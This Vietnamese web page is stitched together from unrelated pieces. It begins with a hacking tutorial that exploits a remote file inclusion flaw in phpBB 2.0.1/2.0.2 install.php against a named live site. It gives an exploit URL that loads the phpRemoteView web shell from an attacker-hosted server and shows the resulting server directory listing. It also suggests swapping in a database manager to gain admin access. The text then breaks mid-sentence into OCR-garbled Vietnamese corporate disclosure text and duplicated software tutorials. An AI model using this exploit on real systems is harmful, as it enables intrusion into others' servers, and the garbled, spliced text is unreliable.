Sử dụng REM VIEW để xemfile trên Server :trang này đã được đọc lần Lỗi sử dụng ở đây là lỗi trong file install.php của forum phpBB 2.0.1 và 2.0.2, các forum dạng này và dính lỗi này rát khổ biến trên NET và Luke đã không khó để có thể chọn random một site làm ví dụ http://www.cyberantics.net/forum/ Bước 1: Kiểm tra xem site đó còn file install.php hay không http://www.cyberantics.net/forum/install.php và may mắn câu trả lời là có. Chúng ta cần chú ý về mã nguồn PHP của nó một chút. Quote Và đồng thời tôi nhập URL sau http://www.cyberantics.net/forum/install.php?phpbb_root_dir=http://www21.brinkster.com/hainamluke/ kết quả nhận được là Quote *Index of /var/www/html/forum/ REMVIEW TOOLS >> [dir commands] type name size owner:group perms mtime DIR admin hackman hackman drwxr-xr-x 20/05/02 08:28:36 DIR contrib hackman hackman drwxr-xr-x 20/05/02 08:28:37 DIR db hackman hackman drwxr-xr-x 20/05/02 08:28:38 DIR docs hackman hackman drwxr-xr-x 20/05/02 08:28:42 DIR images hackman hackman drwxr-xr-x 20/05/02 08:28:45 DIR includes hackman hackman drwxr-xr-x 20/05/02 08:28:47 DIR language hackman hackman drwxr-xr-x 20/05/02 08:28:47 DIR templates hackman hackman drwxr-xr-x 20/05/02 08:28:51 ??/a> ??/a> common.php 5 316 hackman hackman -rw-r--r-- 20/05/02 08:28:36 ??/a> ??/a> config.php 271 hackman hackman -rw-r--r-- 23/05/02 19:17:13 ??/a> ??/a> extension.inc 810 hackman hackman -rw-r--r-- 20/05/02 08:28:42 ??/a> ??/a> faq.php 3 596 hackman hackman -rw-r--r-- 20/05/02 08:28:42 ??/a> ??/a> groupcp.php 45 881 hackman hackman -rw-r--r-- 20/05/02 08:28:42 ??/a> ??/a> index.php 14 298 hackman hackman -rw-r--r-- 20/05/02 08:28:47 ??/a> ??/a> install.php 33 617 hackman hackman -rw-r--r-- 20/05/02 08:28:47 ??/a> ??/a> login.php 6 996 hackman hackman -rw-r--r-- 20/05/02 08:28:50 ??/a> ??/a> memberlist.php 12 112 hackman hackman -rw-r--r-- 20/05/02 08:28:50 ??/a> ??/a> modcp.php 33 764 hackman hackman -rw-r--r-- 20/05/02 08:28:50 ??/a> ??/a> posting.php 34 073 hackman hackman -rw-r--r-- 20/05/02 08:28:50 ??/a> ??/a> privmsg.php 68 622 hackman hackman -rw-r--r-- 20/05/02 08:28:51 ??/a> ??/a> profile.php 3 834 hackman hackman -rw-r--r-- 20/05/02 08:28:51 ??/a> ??/a> search.php 40 471 hackman hackman -rw-r--r-- 20/05/02 08:28:51 ??/a> ??/a> update_to_201.php 24 899 hackman hackman -rw-r--r-- 20/05/02 08:29:08 ??/a> ??/a> upgrade.php 57 040 hackman hackman -rw-r--r-- 20/05/02 08:29:08 ??/a> ??/a> viewforum.php 23 181 hackman hackman -rw-r--r-- 20/05/02 08:29:09 ??/a> ??/a> viewonline.php 7 231 hackman hackman -rw-r--r-- 20/05/02 08:29:09 ??/a> ??/a> viewtopic.php 45 435 hackman hackman -rw-r--r-- 20/05/02 08:29:09 phpRemoteView, version 2002-08-05. Free download - php.spb.ru/remview Nói vậy chắc các bạn cũng đã hiểu qua về lỗi này. Nếu các bạn thay mã nguồn của file remview kia bằng một file dạng DBManager thì bạn có thể access tới toàn bộ DB của victim và lên Admin dễ dàng.
Bây giờ tôi xin nói chi tiết hơn về cách sử dụng remview dạng này. Nếu bạn muốn sử dụng remview như là đang có một file thật trên server của victim thì bạn phải edit đoạn mã sau trong file http://www21.brinkster/hainamluke/includes/functions_selects.php ########## FIND ########### $self=$HTTP_SERVER_VARS['PHP_SELF']; ######################### ######### REPLACE ######### $self= "http://www.cyberantics.net/forum/install.php?phpbb_root ! II!, ' I J6NG CONG TY PHA T DIJ;:N CONG TY CP NHII):T I>II):N BA RJA - - -~ Ir: 1·So: 56-! /NDBR-TC&NS '' f , ' ' V /v: Cong bo thong tin ve ky hgp dong I ~i~m toan Bao cao titi chinh II:11 I , I~p - T\1' do- H~nh phuc Ba Ria, 16 thang 71niim 2014 ;: - Uy Ban Chung kho::'m Nha nu6c; -Sa Giao dich chU:ng khm1n TP H6 Chi Minh; - Trung Tam Luu kY ChU:ng khoan Vi~t Nam; I " Dqc Kinh gui: ll 1:1 C(>NG HOA xA HOI CHU NGHiA VII):T NAM l1 • • I Ten TCPH: Cong ty Co phan Nhi~t di~n Ba Ria i~r giao dich: Ba Ria Thermal Power Joint stock Company Mi'i chung khoan: BTP : !£-&sa chinh: Qu6c 19 51, P Long Huang, ph6 Ba Ria, tinh BRVT Dien thoai:064 2212 811 Fax: 064.3825 985 I S1an giao dich: HOSE ·"tiguai th1,Ic hi~n CBTT: Ong Ph11m Qu6c Thai, Di~n tho11i: 0982 172 728 N~i dung ciia thong tin ciing b6: 1, 1!1 s;an cu Thong tu s6 52/2012/TT-BTC 05/4/2010 v€ vi~c\hu6ng diin cong bo thong tin tren thi truang chung khoan ' Ngay 16/7/2014 Cong ty c6 phdn N~i~t di~n Ba Ri~ da kY hqp _d6ng s6 211 HDK•T/TC v6i Cong ty TNHH Dich v1,1 tu van Tai chinh Ke toan va Kiem toan Phia Na~ICAASCS) v€ vi~c thvc hi~n soatxet Bao cao tai chinh thang ddt\ nam 2014 va kiem toan Bao cao tai chinh nam 2014 cua Cong ty C6 phdn Nhi~t di~n Ba Ria Chung toi cam k~t cac thong ti~ cong b6 tren day Ia dung_ SlJ th~t va hoim toan!chiu trach nhi~m tru6c phap Iu~t ve n(li dung thong tin cong bo I , Tran tr9ng./ I ~ • • !I Ill h I '' ; I " ,,., ' lYO'tln zan: I ' •• - Nhu tnon; - H:IlQT, BKS BTP; - Web$ite BTP; - Lu}iiT,TC&NS II· I : I I,:I 1' illil illII q, I' I I I [: 1! Bandizip - Cách xemfile nén ngay tại menu chuột phải Trước đây để xem nội dung của 1 file nén các bạn vẫn phải mở nó lên bằng 1 phần mềm chuyên dụng. Nhưng với Bandizip các bạn chỉ cần bấm chuột phải vào file nén là đã có thể xem trước toàn bộ nội dung của file đó 1 cách dễ dàng. Hiện nay có rất nhiều các phần mềm hỗ trợ nén file và các tính năng của chúng cũng rất phong phú. Nhưng bạn đã bao giờ thấy 1 phần mềm giải nén có thể cho ta thấy trước nội dung của file nén ngay ở menu chuột phải chưa? Hiện tại, Bandizip là một trong những phần mềm quản lý file nén hiếm hoi cho phép bạn xem trước danh sách các tập tin bên trong một file nén ngay khi kích chuột phải vào file. Chương trình hỗ trợ đầy đủ các định dạng nén phổ biến như RAR, ZIP và tất nhiên là có cả tính năng tạo file EXE tự động giải nén. Ngoài ra, ứng dụng còn hỗ trợ bảng mã Unicode giúp hiển thị các ký tự không phải tiếng Anh một cách hoàn hảo. Ngoài ra, 1 số tính năng khác làm cho Bandizip trở thành phần mềm nén file hiệu quả hơn so với các phần mềm khác. Các tính năng đó bao gồm: - Hỗ trợ kéo thả để nén và giải nén file. - Sử dụng thuật toán nén khá tối ưu (bỏ qua các tập tin không thể nén chỉ tập trung vào các tập tin có khả năng nén). Hầu hết các phần quản lý file nén như Winrar, 7zip đều bắt bạn phải mở file nén thì mới có thể xem được nội dung file. Nhưng bandizip lại cho phép bạn mở nó ngay ở menu chuột phải, một cải tiến lớn so với các ứng dụng khác giúp bạn tiết kiệm tương đối thời gian khi phải duyệt hàng núi file nén. Để giải nén một file, bạn mở nó bằng Bindizip, nhấp vào Extract từ giao diện chính hoặc nhấp chuột phải vào file cần giải nén và chọn Extract Here hoặc Extract Automatically. Tuy nhiên, trước khi giải nén, bạn có thể xem trước các tập tin có trong file ngay tại menu chuột phải. Sau khi chọn Extract Here, Bindizip sẽ giải nén các tập tin vào vị trí mà bạn đã quy định. Trước khi giải nén, bạn cũng có thể kiểm tra xem các file nén có bị lỗi hay không bằng công cụ Test trong giao diện chính của chương trình. Tương tự như vậy, để tạo ra một file nén, bạn khởi động Bandizip chọn Add files hoặc kích chuột phải vào file hoặc folder muốn nén chọn Add files. Tiếp theo bạn chọn mức độ nén, kích thước phân chia file (nếu bạn muốn chia nhỏ các file), mật khẩu bảo vệ và nhấn Start để bắt đầu quá trình nén. Tất cả các file sẽ được nén ở định dạng ZIP. Để tạo ra một file EXE tự giải nén bạn phải chọn tính năng Create Seft Extracting trong phần tùy chọn. Tất cả các file EXE có thể tự giải nén chỉ bằng cách kích đúp vào chúng. Mặc dù có nhiều tùy chọn hữu ích và hỗ trợ cho nhiều định dạng nén phổ biến, Bindizip vẫn có một nhược điểm đó là chỉ tạo ra các file nén định dạng ZIP và EXE. Hy vọng rằng trong tương lai, nhà sản xuất sẽ tăng thêm nhiều định dạng nén hơn nữa. Bindizip hoạt động tốt trên Windows XP, Windows Vista và Windows 7 Xemfile ISO BLURAY nguyên gốc trên các đầu phát HD player Bạn đang sở hữu một đầu HD player dùng xem các phim HD với LCD full HD nhưng chưa thoả mãn lắm với các file HD dạng MKV (rút gọn của đĩa Blu Ray). Giờ này bạn lại muốn xem chính đĩa Blu ray nguyên gốc dạng ISO đang có đầy để tải trên mạng kích thước khùng từ 30-40GB. Chắc sẽ mất nhiều giờ để tải về ISO BluRay đấy nhưng bạn lại không nên dùng phần mềm UltraISO 9.3 mở file này ra xem trong ổ cứng. Dù file ISO này rõ ràng có kích thước trên 30GB nhưng bạn không thấy một file gì cả khi dùng UltraISO để mở. Bạn chỉ nên dùng một phần mềm chuyên sử lý và đọc được đĩa HD-DVD và BluRay được là Isobuster 2.85 nhằm thay cho UltraISO9.3 Tải Iso buster 285 vê từ link Mediafire như sau: http://www.mediafire.com/?k4bbrceiix0vt0y Nếu bạn định thử play file ISO này ngay chính trong đầu HD player sẽ không thể nào xem được cả. Ngoại trừ 2 đầu HD player cao cấp, đắt tiền có tích hợp đầu Bluray như Dune prime 30, hay Noontec A6 Power (chưa có mặt trên thị trường) có thể xem được file ISO của BluRay còn các đầu HD player khác dù là Tvix 6600 đều coi như vô phương. Dù có thê xem tạm ISO này trên máy tính với một vài phần mềm chuyên dụng nhưng bạn không thể nào đã khi xem bằng HD player qua một TV LCD full HD. Vậy có cách nào xem được file ISO full BluRay này trên mọi đầu máy HD player không? Được chứ nhưng bạn phải biết lách thật khéo như sau: Làm sao trích xuất ra được file M2TS trong ISO, là sẽ xem tốt trong hầu hết mọi HD player thôi. Điều cần thiết, là cần có hỗ trợ thêm 2 phần mềm miễn phí là TS muxer và MKV tools. Có thể Tải 2 phần mềm này từ các link như sau:http://www.smlabs.net/tsMuxer/tsMuxeR_1.8.4(b).zip http://www.bunkus.org/videotools/mkvtoolnix/win32/mkvtoolnix-unicode-2.2.0-setup.exe. I)Phương cách nào sẽ xem được file ISO Blu ray này trên đầu HD player và LCD full HD 40 inches trở lên: chỉ cần bạn lần lượt đi từng bước thật đúng như sau: 1) Trong ổ cứng, bạn đã có file ISO full Bluray, như là Celine Dion Live in Las Vegas 2008. UltraISO như đã nói ở trên, khi mở file ISO BluRay, bạn sẽ không thấy file nào cả nhưng vẫn xem được file trong ISO này bằng cách mount lên ổ DVD ảo hiện có trong máy tính (không cần có ổ BluRay): Mở UltraISO và chọn ở menu Tools/Mount to Virtual Drive. Chọn nơi lưu file ISO bluRay và chọn ổ DVDROM để mount hình ảnh ISO này lên. Chỉ sau nửa phút, bạn sẽ xem được toàn bộ các thư mục của ISO Blu Ray trong ổ DVD-ROM. Sau đó, bạn có thể trích ra một file M2TS có size lớn nhất để xem hay toàn bộ mọi file vào ổ cứng. 2) Trường hợp đã tải được và có Isobuster 2.85, bạn khỏi cần mount lên ổ đĩa ảo nào cả mà cứ việc click nút phải vào file ISO BluRay và chọn mở ra bằng ISObuster. 3) Bạn phải tìm ra và sẽ thấy khá nhiều file M2TS có trong thư mục BDMV/ STREAM nhưng chỉ lựa ra một file M2TS chủ yếu có kích thước lớn nhất, thường là trên 25GB đối với đĩa Bluray khoảng 35GB . 4) Bung file TsMuxeR_1.8.4(b).zip tải về và chạy file tsmuxer.exe. Kéo và thả file M2TS chính vào cửa sổ chính hay nhập file vào bằng thẻ input vào cửa sổ input files 5) Bạn sẽ thấy các file video(VC1 hay MPEG2 –M2TS) audio(AC 3-True HD) và các phụ đề nếu có nằm ở cửa sổ dưới, là tracks. Tuỳ bạn cần bỏ thứ nào cho là thừa thải để bớt đi phần nào dung lượng file M2TS làm ra. 6) Dưới 2 cửa sổ này, là mục output, cần đánh dấu chọn nút kiểm M2TS và dùng nút browse, để lựa nơi và đặt tên lại file M2TS sẽ làm ra. 7) Sau cùng, cứ ấn nút start muxing nó làm ra với một tốc độ khá nhanh và chỉ sau một vài phút là xong. Bạn có thể chơi ngay file M2TS kích thước quá lớn này hình ảnh âm thanh đều thật tuyệt, trên mọi đầu HD player. II) Nếu file ISO Bluray này chỉ có phần có audio là TrueHD (AC3) không Cách xemfile nén ngay tại menu chuột phải Trước đây để xem nội dung của 1 file nén các bạn vẫn phải mở nó lên bằng 1 phần mềm chuyên dụng. Nhưng với Bandizip các bạn chỉ cần bấm chuột phải vào file nén là đã có thể xem trước toàn bộ nội dung của file đó 1 cách dễ dàng. Hiện nay có rất nhiều các phần mềm hỗ trợ nén file và các tính năng của chúng cũng rất phong phú. Nhưng bạn đã bao giờ thấy 1 phần mềm giải nén có thể cho ta thấy trước nội dung của file nén ngay ở menu chuột phải chưa? Hiện tại, Bandizip là một trong những phần mềm quản lý file nén hiếm hoi cho phép bạn xem trước danh sách các tập tin bên trong một file nén ngay khi kích chuột phải vào file. Chương trình hỗ trợ đầy đủ các định dạng nén phổ biến như RAR, ZIP và tất nhiên là có cả tính năng tạo file EXE tự động giải nén. Ngoài ra, ứng dụng còn hỗ trợ bảng mã Unicode giúp hiển thị các ký tự không phải tiếng Anh một cách hoàn hảo. Ngoài ra, 1 số tính năng khác làm cho Bandizip trở thành phần mềm nén file hiệu quả hơn so với các phần mềm khác. Các tính năng đó bao gồm: - Hỗ trợ kéo thả để nén và giải nén file. - Sử dụng thuật toán nén khá tối ưu (bỏ qua các tập tin không thể nén chỉ tập trung vào các tập tin có khả năng nén). Hầu hết các phần quản lý file nén như Winrar, 7zip đều bắt bạn phải mở file nén thì mới có thể xem được nội dung file. Nhưng bandizip lại cho phép bạn mở nó ngay ở menu chuột phải, một cải tiến lớn so với các ứng dụng khác giúp bạn tiết kiệm tương đối thời gian khi phải duyệt hàng núi file nén. Để giải nén một file, bạn mở nó bằng Bindizip, nhấp vào Extract từ giao diện chính hoặc nhấp chuột phải vào file cần giải nén và chọn Extract Here hoặc Extract Automatically. Tuy nhiên, trước khi giải nén, bạn có thể xem trước các tập tin có trong file ngay tại menu chuột phải. Sau khi chọn Extract Here, Bindizip sẽ giải nén các tập tin vào vị trí mà bạn đã quy định. Trước khi giải nén, bạn cũng có thể kiểm tra xem các file nén có bị lỗi hay không bằng công cụ Test trong giao diện chính của chương trình. Tương tự như vậy, để tạo ra một file nén, bạn khởi động Bandizip chọn Add files hoặc kích chuột phải vào file hoặc folder muốn nén chọn Add files. Tiếp theo bạn chọn mức độ nén, kích thước phân chia file (nếu bạn muốn chia nhỏ các file), mật khẩu bảo vệ và nhấn Start để bắt đầu quá trình nén. Tất cả các file sẽ được nén ở định dạng ZIP. Để tạo ra một file EXE tự giải nén bạn phải chọn tính năng Create Seft Extracting trong phần tùy chọn. Tất cả các file EXE có thể tự giải nén chỉ bằng cách kích đúp vào chúng. Mặc dù có nhiều tùy chọn hữu ích và hỗ trợ cho nhiều định dạng nén phổ biến, Bindizip vẫn có một nhược điểm đó là chỉ tạo ra các file nén định dạng ZIP và EXE. Hy vọng rằng trong tương lai, nhà sản xuất sẽ tăng thêm nhiều định dạng nén hơn nữa. Bindizip hoạt động tốt trên Windows XP, Windows Vista và Windows 7. Bạn có thể tải Bandizip tại đây. Tham khảo: Addictivetips CÁCH NHÚNG TÀI LIỆU ĐỂ XEM TRỰC TIẾP TRÊN BLOG HAY WEBSITE Lê Tấn Phong (GV trường THPT Thực hành Sp Đại học Cần Thơ) Có rất nhiều trường hợp bạn muốn chia sẽ nội dung tài liệu cho mọi người nhưng không tiện để mọi người download về hay chỉnh sửa nội dung của mình vì lý do cá nhân. Bài viết sau đây sẽ giúp các bạn dễ dàng chia sẽ cho mọi người các tài liệu dạng: pdf, doc, docx, ppt, pptx, dưới dạng xem trực tiếp trên blog mà không cần download máy hay các chương trình hỗ trợ đọc được các loại file này: Bước 1: Upload file lên Google Drive a) Vào Google Drive và đăng nhập với tài khoản Google của mình: b) Nháy vào nút Upload: c) Chọn file để upload lên Drive d) Sau khi upload xong, tiếp tục chọn Share hoặc chọn file rồi nháy nút Share: e) Tiếp theo, trong mục: Public on the web – Anyone on the internet, chọn Change f) Tiếp tục chọn: Public on the web g) Tiếp tục chọn Save: Rồi chọn tiếp Done Bước 2: a) Click phải vào File, chọn Open with, chọn Google Drive Viewer: b) Trong cửa sổ xem tài liệu: Chọn File, chọn Embed this … c) Sau đó Copy toàn bộ nội dung trong khung: Bước 3: Trở lại bài viết trong Blog, chuyển qua thẻ HTML (Nếu là Blog WordPress chọn Text) Sau đó dán đoạn code trên vào. Đến đây bạn có thể xem thử để hưởng thụ thành quả của mình. Chúc các bạn thành công tanphong@ctu.edu.vn